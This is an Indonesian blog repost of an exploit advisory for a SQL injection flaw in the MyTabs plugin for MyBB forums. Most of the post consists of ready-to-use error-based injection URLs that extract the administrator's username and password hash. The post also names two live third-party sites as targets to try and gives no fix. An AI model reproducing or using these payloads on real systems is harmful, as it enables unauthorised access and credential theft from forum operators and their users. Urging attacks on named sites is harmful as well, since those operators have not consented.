MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
Selasa, 18 Oktober 2011
0
komentar
================================================== ===================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
================================================== ===================
# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home :
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid :D !
Vulnerability :
$~ http://localhost/myb.../index.php?tab=[SQLi]
---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------
$~ Get the administrator's username (usually it has uid=1) ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)-- -
$~ Get the administrator's password ~
http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)-- -
You can try on this site
http://secworm.net/forums/index.php?tab=1'
http://icanhazcookie.net/index.php?tab=1'
TERIMA KASIH ATAS KUNJUNGAN SAUDARA
Judul: MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
Ditulis oleh Unknown
Rating Blog 5 dari 5
Semoga artikel ini bermanfaat bagi saudara. Jika ingin mengutip, baik itu sebagian atau keseluruhan dari isi artikel ini harap menyertakan link dofollow ke https://androidjones7.blogspot.com/2011/10/mybb-0day-mytabs-plugin-sql-injection.html. Terima kasih sudah singgah membaca artikel ini.Ditulis oleh Unknown
Rating Blog 5 dari 5
Categories:
Hacking N Tools,
TIPS dan TRICK
0 komentar:
Posting Komentar